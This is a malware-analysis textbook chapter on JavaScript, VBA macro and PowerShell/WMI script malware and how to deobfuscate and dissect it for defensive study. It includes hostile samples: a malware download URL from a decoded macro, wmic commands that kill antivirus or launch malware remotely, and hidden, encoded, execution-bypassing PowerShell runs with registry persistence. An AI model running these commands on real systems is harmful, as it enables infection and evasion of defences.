So far in the book, we spoke about and analyzed malware, which is binary executables. But malware can also be delivered in other file formats as well, and this has turned into a common delivery technique used by attackers these days. Attackers even take it one step further by delivering and executing the contents of nonexecutable malware all in memory, without even writing it to the disk as a file, also known as fileless malware.
Generally, malware is usually in the form of scripts. JavaScript, VBScript, and PowerShell scripts are some of the common scripting languages for creating malicious scripts. These malicious scripts can also be embedded as a part of other files like HTML, Microsoft Office Word documents and Excel sheets, PDF documents, and so forth. Both scripts and these other document files which have embedded malicious scripts within them are commonly used formats for creating malware. This malware is used as an attack vector in phishing emails to deliver them to unsuspecting victims who don’t suspect the attachments to be malicious just because they are nonexecutables.
In this chapter, we look at scripting based malware that is commonly used these days. We also go into the details of dissecting Microsoft Word and Office documents based malware, exploring various static and dynamic techniques to debug them.
Windows Scripting Environment
Almost all operating systems natively have support for scripting languages. These very same languages are utilized by malware authors who write malicious scripts in these scripting languages to deploy their malware.
Some scripting languages allow the script programs/files to be compiled into an intermediate binary representation that can then be executed by their VMs (different from hypervisor virtual machines). In other cases, scripts can even be compiled into binary executables. But the most common way to use and distribute scripting programs is their raw source textual human-readable form, which is what we are going to concern ourselves in this chapter.
Whatever language you write your script in, it requires another interpreter that can understand the contents of the script and execute it. By default, Windows has a scripting environment called Windows scripting host (WSH), which has interpreters that support the execution of JavaScript script files with .js extension and VBScript script files with .vbs extension among others. Later versions of Windows provided a new scripting language called PowerShell, which was meant to be used by users to automate administrative tasks in an enterprise environment.
Most scripts based malware that is targeted for windows is written in VBScript, JavaScript, and PowerShell.
These scripts need not always have to be part of standalone script programs to be run. Instead, they can also be a part of or rather embedded in other files like HTML, Office Documents, and PDF files. The scripts embedded in these files are run when the outer file that contains these scripts are run. For example, consider an HTML file that contains a script written in JavaScript. This JavaScript runs when this HTML file is loaded by browsers like Firefox, Chrome, and Internet Explorer. The JavaScript inside the HTML files is executed by the JavaScript interpreter embedded in these browsers. For example, Firefox uses the SpiderMonkey open source JavaScript engine/interpreter to run JavaScript present in HTML files.
Similarly, Office documents like MS doc and Excel files require Microsoft Office to be installed on the system to open them. These files can have VBA (Visual Basic for Applications) scripts embedded in them, which are also called macros. Microsoft Office software has a VBA interpreter embedded in it to execute the VBA scripts in these docs and Excel files when they are opened.
As mentioned earlier, scripts are passed around in human-readable source code format, so the contained code is visible in plain sight for analysis, unlike compiled programs. To counter this, malware use obfuscation techniques to make it unreadable, to hide the actual content and intention of the code. In the next section, let’s explore some of the obfuscation techniques commonly used by malware.
Obfuscation
Obfuscation is a process meant to hide both the actual content and intent of the program in the script files. These days there are a lot of readily available obfuscators that can turn a plain script code into an unreadable/obfuscated one. Most obfuscators work by treating the entire source code or parts of the code as strings that can be stored across multiple variables in the final generated obfuscated file. The obfuscators break the script code, add some other code along with it, encode parts of it to make it unreadable. Finally, they make sure the logic remains intact at the time of execution. It means the output of the code is not altered as a result of the obfuscation even though the look and feel of the code have changed entirely.
Before we explore some of the simple obfuscation techniques used by malware authors, let’s look at Malzilla, a popular tool which we use to analyze JavaScript code. Malzilla is a popular malware analysis tool specifically built to deobfuscate JavaScript malware, which uses the SpiderMonkey JavaScript engine for executing JavaScript code.
Hello World Plain JavaScript
In the next set of sections, we take the same simple one-liner piece of code from Listing 20-1 and obfuscate it into multiple forms using various techniques. We urge you to execute the obfuscated versions of the code in Malzilla and compare the output with the original code, which should be the same as the output from Figure 20-1.
Hex Equivalents
Obfuscation Using Hex Equivalent for the Code in Listing 20-1
Splits and Joins
Equivalent Obfuscated Code for One from Listing 20-1 That Uses Split Strings
The obfuscator has split the string Hello World! into three strings and stored them into the str1, str2, and str3 variables. If you observe the last line of code, the parameter of document.write combines using the + operator these three variables, which hold the three splits, thereby reconstructing the original string Hello World!
Inserting Junk
Obfuscators often insert both junk code and data among the real script code and data to obfuscate the code. While executing the obfuscated code, the junk code inserted works like the NOP instruction, where running them has no change in state or output of the program. In contrast, the junk data that has been interspersed among the real script data is cleaned/removed to extract the real data before using it.
Equivalent Obfuscated Code for One from Listing 20-1 That Uses Junk Code/Data
If you see the code, the junk string xyA has been inserted at random places inside the Hello World! string to generate the final junk string held in variable string HexyAlloxyAxyA WxyAorxyAldxyA!xyA. The code, when executed, cleans up the junk from this variable str using the replace() function. It reconstructs the original string into the new variable rep1, before it is reused as a parameter to the document.write function.
Equivalent Obfuscated Code for One from Listing 20-1 That Uses Junk Code/Data in Combination with split() and join() APIs
This code also uses the same string with junk inserted as in the previous example, but here the junk string is split into substrings by using xyA as a delimiter. The substrings generated are then joined/concatenated together using the join() function to generate the original string.
Expression Evaluation with eval
Another commonly used function in obfuscated functions is the evaluation functions like eval, which are mostly used to evaluate expressions. In one way, you can say that eval can execute a piece of code that is passed to it as a parameter.
For example, so far, we only saw the use of variables containing string data that was tampered with or obfuscated. With eval we take it further where even the document.write function call can be stringified and supplied as a string to the eval function, which then executes it. This lets us obfuscate the full script, including the various function calls by using various techniques we discussed in the previous section.
Equivalent Obfuscated Code for One from Listing 20-1 That Uses eval() Function
In the listing, you see that even the document.write() function call from Listing 20-1 is stringified and split into multiple strings, and then reassembled back into original form when it is passed as parameter to eval which then execute it.
While deobfuscating and analyzing malware scripts, eval() functions are a good point to investigate. The parameter passed into an eval function is likely to contain the final deobfuscated code.
If you double-click the eval results in the eval window, you can see in the output window the expression or the parameter passed to the eval function. In this case, it is our original de-obfuscated JavaScript code document.write("Hello World!");.
Encryption Algorithms
Obfuscators may use encryption algorithms to encrypt the code into a nonreadable format. One of the most common encoding schemes used for obfuscation is base64 encoding. For example ZG9jdW1lbnQud3JpdGUoIkhlbGxvIFdvcmxkISIpOw== is the base64 encoded string of document.write("Hello World!");. Most of the Base64 encoded strings end with = if it ends up using padding or one of the characters in the set [A-Z, a-z, 0-9, and + /], which makes it easy to identify in a set of characters. If you encounter such a string, you can use a base64 decoder to decode it.
There can be numerous obfuscation techniques used by obfuscators, of which we have covered some of the commonly used ones. In our next section, let’s explore some ways to deobfuscate these obfuscated scripts.
Deobfuscation
Before deobfuscating a code, we need to understand some basics of the scripting language in which the code is written. It’s not necessary to understand all of it. You should understand how variables are declared, how they are assigned values, and so forth. In JavaScript, the var construct declares a variable while in VBScript, the Dim construct is used to do the same. Other constructs like for, while, if, else are the common keywords in almost all the programming languages.
Commonly Used JavaScript Keywords and Functions
Function | Description |
---|---|
eval | Evaluates an expression |
replace | Replaces the occurrence of a substring in a string |
split | Splits strings using delimiter |
join | Joins two strings with a delimiters |
fromCharCode | Converts unicode values to characters |
operator | String concatenation |
concat | String concatenation |
document.write | Writes to HTML document |
console.log | Writes to the browser console |
When you are dealing with obfuscated scripts in other languages, you need to find the relevant keywords and functions in that language as well.
In the next set of sections, let’s explore some of the deobfuscation techniques that we can use.
Static Deobfuscation
Static deobfuscation employs manually assessing the code either by directly reading the code and understanding its constructs or using the aid of other static deobfuscation tools to better format the code and make the process easier and all of it without executing the script code. Again the basics of the programming language are required to understand the code.
This kind of process may be time consuming. Also, most malware’s obfuscated script code does not look as simple as the one in Listing 20-5. Actual malware obfuscated code is usually long and complex, and in a lot of cases, one single line can contain the entire script code.
Do you think you can manually analyze this code by reading it? Maybe parts of it, but not the whole script. Not unless you are Neo from The Matrix.
As seen, Malzilla analyzes the code and formats it into a more readable multiple-line format from the single line it previously used. But with static analysis and manual reading of the script code to understand its intent, it can only take us so far when it comes to figuring out the malware. It’s better to investigate these kinds of codes by debugging or executing them, as you see in the next section.
Dynamic Deobfuscation
This code passed to eval code is again slightly obfuscated but enough to conclude out of it. It has some suspicious domain names in it. If you Google these domain names, you find that they are related to malicious sites, allowing you to conclude that the sample script is malicious.
HTML Code with JavaScript Code from Sample-20-2.html in Our Samples Repo
If you open Sample-20-2.html in a text file and extract the JavaScript code contained with <script> and </script> tags as seen in the listing and paste and try running it in malzilla, it fail and show a compilation error. Why does this happen?
This is because browsers support the getElementById function in the JavaScript code, and Malzilla does not support it. In the code, the obfuscated string is stored in an element with the obfus ID inside an element in the HTML page. The JavaScript fetches the obfuscated code by using getElementById and then deobfuscates the contents. The obfus element forms a part of the Document Object Model (DOM) structure of the HTML page, which can be accessed if the JavaScript code is executed from inside a browser. But since Malzilla is a standalone JavaScript engine, it cannot access the element by any means, and thus throws an error.
JavaScript malware scripts need not always be shipped by an attacker as a standalone script. Malicious JavaScript can be embedded in documents like HTML and PDF. Some HTML files contain JavaScript code that may only run in one particular type of browser. JavaScript can be part of PDF files that can be executed in Foxit, Adobe PDF Readers. Again JavaScript script code embedded in PDF files may also be targeted to run in specific programs like Foxit or Adobe PDF Reader. Malicious JavaScript may also contain exploit code, which is software specific and even version-specific, that are meant to exploit a vulnerability in specifically targeted PDF Reader software programs.
Embedded Script Debuggers
JavaScript Debugger Keyboard Shortcuts for Internet Explorer
Debugger functionality | Keyboard shortcut |
---|---|
Step into | F11 |
Stepver | F10 |
Set Breakpoint | F9 |
Execute | F5 |
Before starting the debugger, you need to set a breakpoint. You can set a breakpoint by going to the specific line in the JavaScript code and pressing the F9 keyboard shortcut, as seen in Figure 20-8.
The watch window displays the list of variables on which the watch has been set. If the code is highly obfuscated, you can keep an eye on the variables in the Watch window. The data stored in these variables alter as we step through the code in the debugger, and at some point in time, they may contain deobfuscated code.
While deobfuscating script-based malware, debugging is one of the best methods to analyze them. JavaScript embedded in HTML pages can be debugged using the JavaScript debugger in the browsers. Similarly, VBA Scripts embedded in Word documents can be debugged using the Visual Basic Debugger present in Microsoft Office, as you will see in the next section. Similarly, PowerShell scripts can be debugged in PowerShell ISE.
All kinds of script debuggers, whether it is a JavaScript debugger in Chrome or Firefox or a Visual Basic Debugger in Microsoft Word, all have got features of code stepping, setting breakpoints, adding watches and so forth. The debugging techniques we applied to deobfuscate the JavaScript can also be utilized to deobfuscate other script-based malware as well.
The Payload
Most of the time, scripting malware is used as downloaders/droppers, which download other malware/payloads like ransomware, banking trojans, and so forth and then execute them on the victim machine. These malicious scripts can also present in compound documents like PDF and Word documents. These documents can also contain malicious executables embedded inside along with the malicious scripts. The embedded scripts are responsible for downloading or extracting this malware and dropping them to the file system and executing them. These kinds of malicious malware fall into the category of droppers. Another kind of payload in the script-based malware can exploit that takes advantage of some vulnerability in the software that loads the scripts.
Downloaders and Droppers
For downloading and dropping capability, the scripts can take the help of the Windows Component Object Model (COM) objects. To simplify COM, you can consider these as Classes that have member variables and functions. We can create objects from these classes and call their methods/functions to avail of various functionalities provided by them.
There can be multiple COM objects for various functionalities, including ones that allow you to access the Internet using an HTTP protocol, interact with the file system, the registry, and so forth. Since we are mostly dealing with downloaders and droppers in this chapter, we look at those COM objects that can help to achieve the mentioned functionalities.
Methods Implemented in MSXML2.ServerXMLHTTP and Their Functionality
Methods | Functionality |
---|---|
open | define HTTP request |
send | send HTTP request |
ResponseBody | contains HTTP Response |
Methods Implemented in ADODB.Stream and Their Functionality
Methods | Functionality |
---|---|
Open | Opens a stream |
Write | Writes data to the stream |
SaveToFile | Saves stream to a file |
Close | Closes the stream |
Methods Implemented in WScript.Shell and Their Functionality
Methods | Functionality |
---|---|
Run | Executes OS command as a new process |
Exec | Executes OS command but as a child process |
RegWrite | Writes key or value to register |
RegRead | Reads key or value to register |
RegDelete | Deletes key or value to register |
The script-based malware written in Visual Basic and JavaScript uses these COM objects to achieve their various functionalities, including downloading additional malware payloads, writing them to files on the disk, and then executing them. While analyzing malicious scripts in the final deobfuscated code, you are likely to see these COM objects plus other similar ones being instantiated and their methods being invoked to achieve various tasks.
Exploits
Various malware that comes in the form of Microsoft Office documents, or PDF files or HTML files might contain exploits targeted for browsers, Microsoft Office document readers or PDF readers. Exploits are pieces of code that take advantage of a vulnerability in the software. A vulnerability is a kind of bug that can compromise software and then the system on which the software is running. Vulnerabilities are exploited/triggered by providing a specially crafted input to the target software. For example, HTML documents can serve as input to browsers like Chrome and Firefox and so forth, while a Word document can serve as an input for Microsoft Office apps.
Exploitation and vulnerability is a vast subject in itself and is beyond the coverage of the book. If you want to find out how an exploit looks like, you can browse through exploit-db.com.
VBScript Malware
Windows Scripting environment, by default, supports Visual Basic Scripting, which is exploited by attackers who send malicious script files in phishing emails that carry the .vbs. Similar to the standalone Visual Basic environment, Visual Basic for Applications (VBA) is a derivative of Visual Basic, similar in syntax, and writes scripting code that is embedded into Microsoft Office applications. Attackers can also embed malicious VB scripts written using VBA into these Microsoft Office documents to create malicious Microsoft Document files.
Some of the Basic Keywords Available in Visual Basic Language
Keywords | Description |
---|---|
Dim | Initializes a variable |
As | Sets data type during variable declaration |
Set | Assigns object to a variable |
If | If condition start |
Then | Code after this executed if the condition is satisfied |
Else | else condition |
EndIf | End of If block |
Sub <subroutine name> | Start of subroutine |
End Sub | End of subroutine |
Function <Function Name> | Start of a function |
End Function | End of Function |
While browsing through visual basic programs, you encounter two kinds of procedures or functions, called subroutines and functions. Both are quite similar. But the basic difference is that subroutines do not return anything while Functions do. A function starts with a Function keyword and ends with an End Function keyword.
Sample Visual Basic Code That Downloads and Executes Malware
The code uses the COM objects MSXML2.ServerXMLHTTP, ADODB.Stream and WScript.Shell, which we spoke about earlier to access the malicious URL, download the malware hosted on it and execute it. You encounter very similar codes in VBScript and VBA malware. But the code won’t be in a plain format as seen in the code listing and is most often obfuscated. We need to deobfuscate it to dissect the actual code and figure out its intention. We explain VBA deobfuscation in malicious Microsoft Office documents in the next section.
Microsoft Office Malware
Office documents like Word, PowerPoint, Excel sheets have been constantly used by attackers to carry out phishing attacks via email. In a lot of phishing attacks, these malicious documents contain hyperlinks that redirect to malicious websites when the victim clicks on it. Attackers frequently use these kinds of documents to deliver malware because users tend to have the perception that if it is not an executable, it may not be malicious. Combined with the fact that most users use these kinds of documents to store their data, it makes an attractive option for attackers to use.
In this section, we look at more stealthy and more complex forms of attack using documents where malicious executables and scripts are deeply embedded into the file format of these Microsoft Office documents.
When dealing with Microsoft Office malware, you usually see three types of file extensions for these document files: .doc, .docx, .rtf. Similarly, for PowerPoint files, you see .ppt and .pptx, and for Excel files, you see .xls and .xlsx. All Microsoft Office versions support the file formats for the .doc, .ppt and .xls file extensions while .docx, .pptx, and .xlsx are supported by Microsoft Office 2007 onward. To understand attacks based on these Office documents, we need to look at the OLE file format, which is the file format used by Microsoft Office documents.
OLE File Format
Object Linking and Embedding (OLE) is a file format developed by Microsoft that allows other kinds of files like executables, media files, hyperlinks, and scripts to be embedded into these documents that use the OLE file format, and Microsoft Office documents follow the OLE file format.
OLE is a compound file format that can accommodate other files in it, just like a file system. OLE file formats can accommodate media files, text files, macros (scripts), embedded executables, and so forth.
As malware analysts, we are more concerned about embedded macros and embedded executables, since malware attackers use them to ship around malicious documents. Macros are script codes that are meant for automating certain tasks within a document. We look at macros with some more details later.
Like we said earlier, the OLE file format is like a file system, where various kinds of objects can be stored within it in a structured manner. It has storages that are equivalent to directories on a file system and streams, which are equivalent to files on file systems. Just like directories can have subdirectories and files under them, the storage in OLE files can have more storage and streams under them. Media files, macro codes, binary executables are stored inside streams. The storage can have names that can give an idea about the contents of the storage.
Macro: Contains macro Codes
ObjectPool: Contains objects which can include media, embedded executables.
MsoDataStore: Stores the metadata of information about other contents
From the point of view of malware analysis, Macros and ObjectPool are the important ones. The first one is likely to contain malicious macro scripting code while the second one can have embedded malicious executables. In the next section, let’s explore the OLE file format with the help of some tools.
Dissecting the OLE Format
Several tools can parse the OLE file format. Some of the tools have a nice user interface, but some are just having a command line. Two such popular tools are Oletools and OleDump.py from Didier Stevens
The stream named Ole10Native contains embedded data in it, which seems to be a PE executable file as identified by the MZ magic bytes.
The output from oledump.py displays the streams in various storage of the .doc file. The tool has numbered the streams from 1 to 17. The storage name ends with / just like we see for a directory in a file system. If you notice in the figure, some of the storage objects are Macros, Macros/VBA, OleObjectPool, MsoDataStore, all of which are followed by a /. The second column displays the kind of stream where M represents a macro while O represents an embedded object. You can match the names of the storages and streams seen from the output with the output we saw from the UI of DocFileViewer. In the next section, we are going to extract and analyze these streams.
Extracting Streams
Streams can be extracted using the DocFileViewer tool. But some of the streams, especially the macro streams, can be compressed. Oledump.py is a better option to extract streams as it has the option to decompress the streams as well.
To dump a stream using oledump.py, you can use the command oledump.py -s Stream_Number -[d|v] <File_Path>.The -s option specify the number of the stream as displayed by the oledump.py output seen earlier in FIgure 20-14. <File_Path> is the path of the Microsoft Office file you want to analyze. The second option can specify how we want the stream to be processed while being dumped. If you use the -d option, it instructs oledump.py to dump the raw contents of the stream. This is useful when you are dumping a stream containing an embedded executable. If it is a macro stream that you want to extract, you can use the -v option, which can dump the decompressed macro script code.
As we saw in the oldedump.py output for Sample-20-3.doc in Figure 20-14 and DocFileViewer tool as well in Figure 20-13, it contains a stream, Ole10Native, which holds an embedded PE executable. oledump.py has numbered this stream with number 14. Let’s dump this stream using oledump.py. You can redirect the output, which contains the stream contents to a file using the redirection operator >> at the end of the command. Run the command oledump.py -s 14 -d Sample-20-3.doc >> dumpfile, which dumps the contents of the stream 14 to a file named dumpfile. You can now further analyze the contents of dumpfile using a hex editor of your choice.
So, 46 out of 69 anti-malware programs are detecting the file at the time we uploaded it. This is a good indication of maliciousness.
In the next section, let’s look at macro streams and how to extract and analyze them from Office OLE files. But first, let’s try to understand some of the basics of macro programming.
Macros
Macros are scripts that are meant for automating tasks in Microsoft Word, Excel, and PowerPoint files, and are embedded inside the OLE file format in these files. Macros are mostly written in programming languages like VBA. Malicious threat actors embed malicious macros into these Office document files, turning them malicious. When unsuspecting victims open these malicious documents on their system using Microsoft Office Suite of tools like Microsoft Word, Excel, and PowerPoint, the Office tool executes this embedded malicious macro in these Office files, thereby infecting the system.
We already talked about some basics of Visual Basic Scripting. As we mentioned earlier, VBA scripts are also similar to VB Scripts. But since VBA is specially meant to be executed within the Office documents, there are certain extra features in it related to Microsoft Office documents. One of the special features is the automatic subroutines, which is exploited by malware writers to write malicious macros, which we discuss next.
Automatic Macros
Some of the Auto Subroutines Present in the Office VBA Environment That Can Be Used by Macros
Subroutine Name | Triggering Event |
---|---|
AutoExec | When Word is started |
AutoNew | When new document is created |
AutoOpen | When existing document is opened |
AutoClose | When document is closed |
AutoExit | When you exit a Word document |
Example Macro with AutoOpen Subroutine That Places a HTTP Request on Document Open
Now that you know the basics of VBA macros, let’s learn how to extract and analyze them. We again use the Oledump tool for the same.
Macro Extraction
As an exercise, open the text file Sample-20-4.txt from the samples repo, which contains instructions to download the actual malware Office .doc file, which you can download and then rename as Sample-20-4.doc. Let’s look at the OLE structure using oledumpy.py for this document file, as we did in the previous section.
As you can see in the screenshot, which you can also check in the dumpfile file output that contains the same macro code, the macro script code has defined a Document_Open() automatic subroutine, which is triggered when the document is opened. The subroutine calls another JTCKC() function. If you look at the code of the Document_Open()subroutine, it invokes the JTCKC() function several times.
From visually analyzing this macro code, it is hard to figure out the variable names since they have very randomized and long names, which is a clear sign of obfuscation. It is still possible to manually read the code and figure out its meaning and intent, but it can be time-consuming. But if we debug the code, it is much easier to de-obfuscate it as well and understand its functionality. To dynamically debug this macro, we can use the built-in Visual Basic debugger provided by Microsoft Word Office tool, as you see in the next section.
Macro Deobfuscation Using Debugging
The left side of the window is the project window, which can display the files used in the VBA project. The right-hand window is the debugger window, which we use to debug the VBA macros.
VBA Debugger Shortcuts
Debugger Functionality | Keyboard Shortcut |
---|---|
Step Into | F8 |
Step Over | Shift+F8 |
Run to Cursor | Ctrl+F8 |
Set Breakpoint | F9 |
Execute | F5 |
The debugger step functionalities Step Into, Step Over, and Breakpoints are the same as in all the other debuggers.
As you can see, when you start the debugger from the Document_Open() location, you see a yellow arrow cursor on the margin on the left side of the code. This yellow arrow cursor points to the code which is going to be executed next. We can step through the code line by line to see the values in various variables that can hold deobfuscated content. The technique of starting debugger may vary between versions of Microsoft Office, but the overall techniques of debugging remain the same.
If you observe the macro code, two of the variables are used quite frequently FSGOPS and NAQGP. The variables are used again and again throughout the macro code, and some values are assigned to these. Most likely, these variables are likely to hold some important value.
If you scroll down through the code, you also see VMSXE.Eval(NAQGP). Eval similar to the one we encountered in JavaScript is meant to evaluate or execute a piece of code supplied to it as a string parameter. This means the variable NAQGP, which is supplied to the Eval function, is likely to contain some kind of deobfuscated code at the point where it is called. If you execute the code till this particular point where this Eval is invoked, you can expect that the NAQGP variable is going to have some deobfuscated content.
Figure 20-23 shows the debugger after executing has stopped at the breakpoint we have set at this location.
The decoded VBA code printed from the NAQGP variable that is executed from the Eval()contains an URL that points to file.exe on the host with IP address 216.170.126.3. The macro seems to download this file from this URL http://216.170.126.3/wfil/file.exe, as indicated by the get HTTP request. The downloaded file.exe contents are saved to a file whose path is located in FullX, which is then executed as seen by the command ShellObj.Exec(FullX).
Other tools can help you to analyze VBA malware as well apart from the VBA debugger in Office tools and oledump.py we explored. Some of the other well-known ones are OleTools, OffVis, and OfficeMalScanner. As an exercise, try out these other tools and figure out how it works.
Fileless Malware
We have seen most of the malware have file instances on the hard drive that is executed to create a malicious process. This can pose a higher risk for malware as antiviruses constantly scan the hard drive for malware files. To evade antivirus disk scans, malware authors came up with fileless malware in which the malware file contents are not written to the disk.
There can be multiple ways in which a fileless malware can be created. If your malware is a PE executable that you have on a remote malicious server, you can download the contents of this malware file and can carry out complete in-memory process hollowing with the contents of the malicious PE executable that you can then insert into another hollowed process, all this without writing the contents of the malicious PE executable file to the disk. The other readily available technique is to use the windows scripting system to run malicious scripts.
Windows Management Instrumentation (WMI)
Windows Management Instrumentation (WMI) is an implementation of Web-Based Enterprise Management (WBEM), a standard for managing desktops, servers, and shares in an enterprise environment. The purpose of its existence is to help administrators to monitor and automate administrative tasks in an Enterprise ecosystem.
Since WMI is used as an administrative tool, it is less likely to be blocked or held suspicious by network administrators. These two factors make WMI the right candidate to be used for carrying out malicious attacks. Attackers can use the already existing WMI framework instead of installing new malware, called a living off the land attack. The earliest known malicious use of WMI was first seen in the infamous Stuxnet attack. Now it is gaining popularity among attackers to carry out the fileless attacks.
As malware analysts, we need not look at the fine implementation of WMI. Superficially we can consider WMI as a database that is enriched with information related to the current state of the system. It can contain detailed information/data about processes, services, hardware, and so forth, which WMI organizes into WMI classes. The classes are further grouped into namespaces. As an example, Win32_Process is a class that stores information about processes and is part of the root/cimv2 namespace.
You can also directly query for WMI data using windows command prompt as well using the wmic command provided by Windows, which is what malware frequently use. If you remember in the previous chapter, we talked about how malware evades the security system, analysis tools by enumerating the environment the setup they are executing in. Malware can do the same using WMI queries as well.
As seen, the wmi query lists all processes which have the string vm in their names. Since our analysis VM inside which we ran this command is installed on VMware workstation, we can see some of the guest VMWare related processes on the system.
WMI Queries to Get System Model and MAC Address Of the Network interfaces
The output of the commands shows that the system model and MAC address are related to VMWare. Isn’t this easy compared to calling several Windows APIs to obtain the same bit of information?
WMI Commands For Process
Command | Description |
---|---|
wmic process where name="antivirus.exe" call terminate | Kills a process with name antivirus.exe |
wmic.exe process call create malware.exe | Launches process for malware.exe file |
wmic.exe /node:remote_ip process call create "malware.exe" | Launches malware.exe in a remote system whose ip is remote_ip |
WMI commands can be triggered from VBA scripts in Word documents and PowerShell script files. The availability of WMI has made coding of evasion techniques by malware easier since they are available in scripting frameworks like VBA and PowerShell, which otherwise have been difficult.
PowerShell
PowerShell was created to cater to the automation needs on Windows, especially for administrative purposes. PowerShell has extensive access to the system resources and can access WMI as well. It can execute commands on local as well as remote machines. Also, PowerShell has some command-line options that can hide its presence from plain sight. Another powerful option that PowerShell provides is in-memory execution of PowerShell scripting code, which is used by attackers to carry out fileless malware attacks. These PowerShell attributes make it an appropriate tool to carry out malicious attacks.
The PowerShell scripts are written using PowerShell commands called cmdlets and PowerShell functions. In the next section, we look at some basics of cmdlets and some important cmdlets.
Cmdlets and Aliases
Command-lets or cmdlets are commands that are available for use in the PowerShell scripting language. Cmdlets are .NET classes compiled into DLL files which are accessible using PowerShell scripts or the PowerShell environment. Let’s try out some cmd-lets to understand how they work.
You can access the PowerShell scripting environment by typing in Windows PowerShell in your start menu, which shows you the Windows PowerShell application. Open this Windows PowerShell application, which is very similar to the regular command prompt available in Windows, except that you can see that the prompt has PS, which identifies that the scripting command environment available is that of PowerShell. You can type in your PowerShell commands there.
If you look at the output, the first column tells the type of the command, second the name of the command, and third its description. There are three types of commands from the output: cmdlet, function, and alias. We already know what cmdlets are .Net compiled objects, whereas the function ones are written in PowerShell scripting language itself.
The cmdlet names are in the verb-noun format (e.g., Start-Process). The function names are in the verb-noun format (e.g., DownloadString). An alias can be an alternate name for a cmdlet, function, executable, and so forth. For example, IEX is an alias for the Invoke-Expression cmdlet. Alias names can be anything since it anyways points to another cmdlet or function. That's why aliases are used in Obfuscated PowerShell scripts where random weird alias names are used by attackers that point to other cmdlets, functions, executables so that analysts find it hard to statically analyze PowerShell scripts.
To know the name of an alias corresponding to a cmdlet, you can use the command Get-Alias. The Get-Alias -Definition Invoke-Expression command gets the alias name for Invoke-Expression cmdlet, which is iex. If you want to know the cmdlet or function corresponding to a particular alias, you can use the same Get-Alias command in combination with findstr windows command. Get-Alias| findstr "iex" PowerShell command can get you the cmdlet whose alias is iex.
Some Commonly Used Commands and Functions Used by Malware
Command/Functions | Alias | Description |
---|---|---|
Invoke-Expression | IEX | Evaluates expression |
Invoke-Command | ICM | Executes command on local or remote machine |
Start-Process | start/saps | Starts a process |
Get-WmiObject | gwmi | WMI class information |
DownloadFile | Downloads file to disk | |
DownloadString | Downloads a web page to memory | |
shellexecute | Executes a command |
The cmdlets can be directly called from a PowerShell script. But to call a function, you need to create an object out of the .Net class containing the function and then access the member function from the created object.
Example PowerShell Script That Shows Usage Of Cmdlet and Functions
In the PowerShell script code, the first line download malware.exe hosted on malwareurl server to a local file virus.exe using DownloadFile function. The DownloadFile function is a part of System.Net.WebClient .NET class. An object is created out of the class by using the New-Object keyword. Afterward, the DownloadFile function, which is a method of the System.Net.WebClient class, is accessed. The second code line shows the usage of StartProcess cmdlet, which executes the virus.exe file.
In-Memory Attacks
Some of the PowerShell Command-Line Parameters
Command Option | Description |
---|---|
-file | Option to pass script file to PowerShell |
-Command / -c | Executes PowerShell commands directly from the prompt instead of script |
-Nop / -Noprofile | Ignores commands in the profile file |
-WindowStyle hidden / -w hidden | Hides the window from the user |
-Exec Bypass | Bypasses execution policies or restriction on the system related to PowerShell |
-EncodedCommand / -e / -Enc | Passes encoded commands which are mostly base64 encoded |
After you hit Enter, the prompt vanished, and calc.exe (calculator) pops up. So if instead of a calculator program, if it were a malware executable, you would not have got hints of the PowerShell execution since the PowerShell prompt vanishes. Since most malware does not have GUI, you wouldn’t be alerted to the start of this malware process.
PowerShell Script Passed As a Command-Line Argument Value
PowerShell Command That Runs Another Encoded PowerShell Command
The long encoded string is a base64 encoded form of the PowerShell command powershell.exe -nop -w hidden -c Start-Process(calc.exe). To verify this you can copy the base64 string and decode it using any of the online base64 decoders.
If you are an attacker you can place this entire command as a run entry in the registry like you learned in Chapter 8, and this entire command line is executed on bootup without even needing to have a script file on the disk. This technique can maintain persistence in fileless attacks.
Attackers Using In-Memory Execution to Run Malicious Scripts Hosted Remotely
More complex attacks like reflective DLL injection attacks can also be carried out by using this in-memory execution feature of PowerShell. The attacks can be made more sophisticated by the use of WMI in the scripts and other persistence mechanisms and all the living off the land using the tools provided natively by the Windows OS environment.
PowerShell scripts can also be debugged using PowerShell ISE, an integrated debugging scripting environment for PowerShell. You can apply the same deobfuscation tricks we used in debugging JavaScript and VBA programs using PowerShell ISE, which we leave as an exercise for you.
Summary
Scripting based malware attacks are huge, allowing attackers to leverage the various programming and scripting environments natively available in the OS subsystem, basically allowing them to live off the land. In this chapter, we explore JavaScript malware and how to both statically and dynamically deobfuscate and dissect them to figure out their functionality. We also explore the various kinds of obfuscation techniques commonly used by obfuscators to obfuscate scripting code.
We then explore Visual Basic scripting malware and the more commonly used VBA macro scripting malware embedded and distributed via malicious Microsoft Office documents. You learned how to use the VBA debugger in Microsoft Office tools to debug these embedded macros in these Microsoft Office files. You also learned how to use other analysis tools like oledump.py using which we can dump and analyze these macros and other embedded executable files contained within these documents, a technique frequently used by attackers to ship around malicious PE executables embedded in these document files.
Lastly, we covered WMIC and PowerShell based scripts that are leveraged by attackers to launch covert attacks that are fileless and in-memory, leaving no traces of their execution on the system.